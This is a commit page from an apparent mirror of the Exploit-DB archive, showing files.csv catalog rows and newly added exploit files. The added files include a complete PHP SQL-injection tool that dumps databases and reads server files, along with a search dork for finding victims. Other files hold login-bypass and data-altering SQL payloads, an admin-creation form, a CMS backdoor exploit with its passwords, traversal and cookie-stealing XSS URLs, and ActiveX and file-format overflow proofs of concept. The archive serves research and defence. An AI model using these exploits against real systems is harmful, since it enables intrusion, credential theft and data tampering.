bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_10_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-10 04:25:18 +00:00
parent cddc6c7998
commit 8198dd43d5
20 changed files with 992 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -27404,6 +27404,7 @@ id,file,description,date,author,platform,type,port
30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 xlaapmview.asp Cross Site Scripting Vulnerability",2007-08-30,"Richard Brain",asp,webapps,0 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 xlaapmview.asp Cross Site Scripting Vulnerability",2007-08-30,"Richard Brain",asp,webapps,0
30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0 30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0
30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF Vulnerability",2013-12-28,"FIGHTERx war",hardware,webapps,0 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF Vulnerability",2013-12-28,"FIGHTERx war",hardware,webapps,0
30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0
30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0
@ -27519,6 +27520,7 @@ id,file,description,date,author,platform,type,port
30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0 30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0
30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
30669,platforms/windows/webapps/30669.txt,"DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilties",2014-01-03,"mohamad ch",windows,webapps,0
30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0 30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0
30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 Error Page Cross Site Scripting Vulnerability",2007-10-15,SkyOut,hardware,remote,0 30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 Error Page Cross Site Scripting Vulnerability",2007-10-15,SkyOut,hardware,remote,0
30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting Vulnerability",2007-10-15,JosS,java,webapps,0 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting Vulnerability",2007-10-15,JosS,java,webapps,0
@ -27534,6 +27536,7 @@ id,file,description,date,author,platform,type,port
30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0
30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0
30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0
@ -27617,7 +27620,23 @@ id,file,description,date,author,platform,type,port
30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0
30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0 30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0
30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0
30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80
30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",2014-01-07,metasploit,php,remote,80 30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",2014-01-07,metasploit,php,remote,80
30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0
30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80
30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0
30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0
30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0
30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0
30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0
30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0
30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 Search.ASP SQL Injection Vulnerability",2007-11-22,"Aria-Security Team",asp,webapps,0
30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.PHP HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0
30800,platforms/asp/webapps/30800.html,"FooSun Api_Response.ASP SQL Injection Vulnerability",2007-11-23,flyh4t,asp,webapps,0
30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0
30802,platforms/windows/local/30802.c,"VMware Tools 3.1 HGFS.Sys Local Privilege Escalation Vulnerability",2007-11-24,SoBeIt,windows,local,0
30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection Vulnerability",2007-11-24,"Aria-Security Team",php,webapps,0
30804,platforms/php/webapps/30804.txt,"VBTube 1.1 Search Cross Site Scripting Vulnerability",2007-11-24,Crackers_Child,php,webapps,0
30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0

Can't render this file because it is too large.

11
platforms/asp/webapps/30793.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26522/info
Mass Mailer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following proof-of-concept example is available:
Login Page (Default.asp)
Password: anything' OR 'x'='x

11
platforms/asp/webapps/30794.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26523/info
VUNET Case Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VUNET Case Manager 3.4 is vulnerable; other versions may also be affected.
The following example password is available for the 'Login' page ('Default.asp'):
Password: anything' OR 'x'='x

7
platforms/asp/webapps/30796.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/26526/info
E-vanced Solutions E-vents is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/eventsignup.asp?ID=4197 UNION ALL SELECT username, etc FROM users--

9
platforms/asp/webapps/30798.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26540/info
NetAuctionHelp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NetAuctionHelp 4.1 is vulnerable; other versions may also be affected.
http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1-- http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)-- http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)-- http://www.example.com/itemdtl.asp?id=1-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

7
platforms/asp/webapps/30800.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/26552/info
FooSun is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>foosun create new admin exp Codz By flyh4t</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD> <BODY style="FONT-SIZE: 9pt">------------------------ foosun create new admin exp Codz By flyh4t --------------------------- <FORM name=frm method=post target=_blank>foosun path: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=http://demo.foosun.net name=act><br> <INPUT type="hidden" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=/api/Api_response.asp?syskey=8076ac99d47feeb6&password=flyh4t&SaveCookie=1&UserName=flyh4t';insert%20into%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x3800330061006100340030003000610066003400360034006300370036006400,1)-- name=sql><br> <INPUT onclick="Javascipt:frm.action=document.all.act.value+document.all.sql.value; frm. submit();" type=button value=". ." name=Send></FORM> Hey boy, fun the game... <br> It is just a exp for the bug of foosun...<br> can create a new admin oldjun/12345678...<br> </BODY> </HTML>

8
platforms/cgi/webapps/30795.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/26525/info
GWExtranet is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks.
http://www.example.com/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00
http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll

179
platforms/php/webapps/30689.php Executable file
View file

@ -0,0 +1,179 @@
<?php
/*
# Exploit Title: Taboada Macronews <= 1.0 SQLi Exploit
# Date: 03rd January 2013
# Exploit Author: WhiteCollarGroup
# Software Link: http://www.scriptbrasil.com.br/download/codigo/7144/
# Version: 1.0
# Google Dork: intext:"Powered by: joaotaboada.com"
Usage:
php filename.php
*/
function puts($str) {
echo $str."\n";
}
function gets() {
return trim(fgets(STDIN));
}
function hex($string){
$hex=''; // PHP 'Dim' =]
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return '0x'.$hex;
}
$token = uniqid();
$token_hex = hex($token);
puts("Taboada Macronews <= 1.0 SQL Injection Exploit");
puts("By WhiteCollarGroup (0KaL miss all of you guys)");
puts("[?] Enter website URL (e. g.: http://www.target.com/taboada/):");
$target = gets();
puts("[*] Checking...");
if(!@file_get_contents($target)) die("[!] Access error: check domain and path.");
puts("[.] Connected.");
if(substr($target, (strlen($target)-1))!="/") $target .= "/";
function runquery($query) {
global $target,$token,$token_hex;
$query = preg_replace("/;$/", null, $query);
$query = urlencode($query);
$rodar = $target . "news_popup.php?id='%20UNION%20ALL%20SELECT%201,2,3,concat($token_hex,%28$query%29,$token_hex),5,6,7,8--%20";
// die($rodar);
$get = file_get_contents($rodar);
$matches = array();
preg_match_all("/$token(.*)$token/", $get, $matches);
if(isset($matches[1][0]))
return $matches[1][0];
else
return false;
}
if(runquery("SELECT $token_hex")!=$token) {
puts("[!] Couldn't get data");
exit;
}
puts("[i] MySQL version is ".runquery("SELECT version()"));
puts("[i] MySQL user is ".runquery("SELECT user()"));
function main($msg=null) {
global $token,$token_hex;
echo "\n".$msg."\n";
puts("[>] MAIN MENU");
puts("[1] Browse MySQL");
puts("[2] Run SQL Query");
puts("[3] Read file");
puts("[4] About");
puts("[0] Exit");
$resp = gets();
if($resp=="0")
exit;
elseif($resp=="1") {
// pega dbs
$i = 0;
puts("[.] Getting databases:");
while(true) {
$pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;
$i++;
}
puts("[!] Current database: ".runquery("SELECT database()"));
puts("[?] Enter database name for select:");
$own = array();
$own['db'] = gets();
$own['dbh'] = hex($own['db']);
// pega tables da db
$i = 0;
puts("[.] Getting tables from $own[db]:");
while(true) {
$pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;
$i++;
}
puts("[?] Enter table name for select:");
$own['tb'] = gets();
$own['tbh'] = hex($own['tb']);
// pega colunas da table
$i = 0;
puts("[.] Getting columns from $own[db].$own[tb]:");
while(true) {
$pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;
$i++;
}
puts("[?] Enter columns name, separated by commas (\",\") for select:");
$own['cl'] = explode(",", gets());
// pega dados das colunas
foreach($own['cl'] as $coluna) {
$i = 0;
puts("[=] Column: $coluna");
while(true) {
$pega = runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1");
if($pega) {
puts(" - $pega");
$i++;
} else
break;
}
echo "\n[ ] -+-\n";
}
main();
} elseif($resp=="2") {
puts("[~] RUN SQL QUERY");
puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
puts("[?] Query (enter for exit): ");
$query = gets();
if(!$query) main();
else main(runquery($query."\n"));
} elseif($resp=="3") {
puts("[?] File path (may not have priv):");
$file = hex(gets());
$le = runquery("SELECT load_file($file) AS wc");
if($le)
main($le);
else
main("File not found, empty or no priv!");
} elseif($resp=="4") {
puts("Coded by 0KaL @ WhiteCollarGroup");
puts("tinyurl.com/WCollarGroup");
main();
}
else
main("[!] Wrong choice.");
}
main();

37
platforms/php/webapps/30786.txt Executable file
View file

@ -0,0 +1,37 @@
Middle School Homework Page V1.3 Beta 1 - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/mshwpage/
####################################################################
I. Sql Injection
##############
VULNERABILITY
##############
/view.php (line 3-4)
-----------------------------------------------------------------------------
<h2>Homework for <?php get_array("select * from class where
classID=$_REQUEST[class]", 'classDesc') ?> as of <?php $today = date("M j
G:i:s T Y");echo $today; ?>:</h2>
<?php
-----------------------------------------------------------------------------
#########
EXPLOIT
#########
(
localhost/mshwpage/view.php?class=null+and+1=2+union+select+1,concat(name,0x3a,pass)+from+teachinfo
II. Cross Site Scripting
localhost/mshwpage/view.php?class=<script>alert(document.cookie);</script>
####################################################################

9
platforms/php/webapps/30792.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26521/info
Underground CMS is prone to a backdoor vulnerability.
Attackers can exploit this issue to gain unauthorized access to the application. Successful attacks will compromise the affected application and possibly the underlying webserver.
Underground CMS 1.4, 1.7, and 1.8 are vulnerable; other versions may also be affected.
<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> &lt;/textarea&gt; <br /> <input type="submit" value="exploit"> </form> </body> <!-- It?s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html>

7
platforms/php/webapps/30799.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/26544/info
MySpace Scripts Poll Creator is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
http://www.example.com/poll/index.php?action=create_new

12
platforms/php/webapps/30801.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26553/info
Bandersnatch is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Bandersnatch 0.4 is vulnerable; other versions may also be affected.
http://www.example.com/path/to/index.php?func=[injectionpoint]
http://www.example.com/path/to/index.php?date=[injectionpoint]
http://www.example.com/path/to/index.php?func=log&jid=[injectionpoint]
http://www.example.com/path/to/index.php?func=user&jid=[injectionpoint]

10
platforms/php/webapps/30803.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/26558/info
E-lite POS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects E-Lite POS 1.0; other versions may also be vulnerable.
-1' UPDATE users set user_name= 'admin' Where(user_iD= '1');--
-1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');--

9
platforms/php/webapps/30804.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26566/info
VBTube is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects VBTube 1.1; other versions may also be vulnerable.
http://www.example.com/vBTube.php?do=search&search=<script>alert(document.cookie)</script>

45
platforms/windows/dos/30550.php Executable file
View file

@ -0,0 +1,45 @@
<?php
/*
*Title: Ofilter Player 1.1 (.wav) Integer Division by Zero
*Version: 1.1
*Tested on: Windows XP SP2 en
*Vendor: http://www.008soft.com/
*Software Link: http://www.008soft.com/downloads_OfilterPlayer.exe
*E-Mail: OsandaJayathissa@gmail.com
*Bug Discovered by: Osanda Malith
*Twitter: @OsandaMalith
* /!\ Author is not responsible for any damage you cause
* This POC is for educational purposes only
*/
$poc=
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
file_put_contents("ofilterplayer.wav", $poc);
print <<< str
[+] Ofilter Player 1.1 Integer Division by Zero
[+] by Osanda Malith (@OsandaMalith)
[~] File Created "ofilterplayer.wav"
str;
?>

29
platforms/windows/dos/30797.html Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/26537/info
Aurigma Image Uploader ActiveX control is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
Versions prior to Aurigma Image Uploader 4.5.70 are affected.
UPDATE (November 26, 2007): Reports indicate that this issue occurs because of a buffer-overflow issue that affects a Win32API method. This has not been confirmed. We will update this BID as more information emerges.
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
obj.GotoFolder(s);
obj.CanGotoFolder(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>

30
platforms/windows/dos/30805.html Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/26573/info
RichFX Basic Player ActiveX Control is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
Note that RichFX Player ActiveX Control is installed by default with RealNetworks RealPlayer. It may be shipped with other RealNetworks products as well.
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr"); //{47F59200-8783-11D2-8343-00A0C945A819}
obj.DoInstall(s);
obj.QueryComponents(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>

50
platforms/windows/local/30783.py Executable file
View file

@ -0,0 +1,50 @@
#!/usr/bin/env python
# Exploit Title: CCProxy v7.3 Integer Overflow Exploit
# Date: 2013/03/22
# Author: Mr.XHat
# E-Mail: Mr.XHat {AT} GMail.com
# Vendor Homepage: http://www.youngzsoft.net/
# Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe
# Version: Prior To 7.3
# Discovered By: Mr.XHat
# Tested On: WinXP SP3 EN
hdr = "[System]"
hdr += "\x0d\x0a"
hdr += "Ver=7.3"
hdr += "\x0d\x0a"
hdr += "Language="
# EAX: 0x41414131
buf = "\x41" * 1028
gdt1 = "\x04\xB4\x12\x00"
pad1 = "\x41" * 4
gdt2 = "\xF4\xB3\x12\x00"
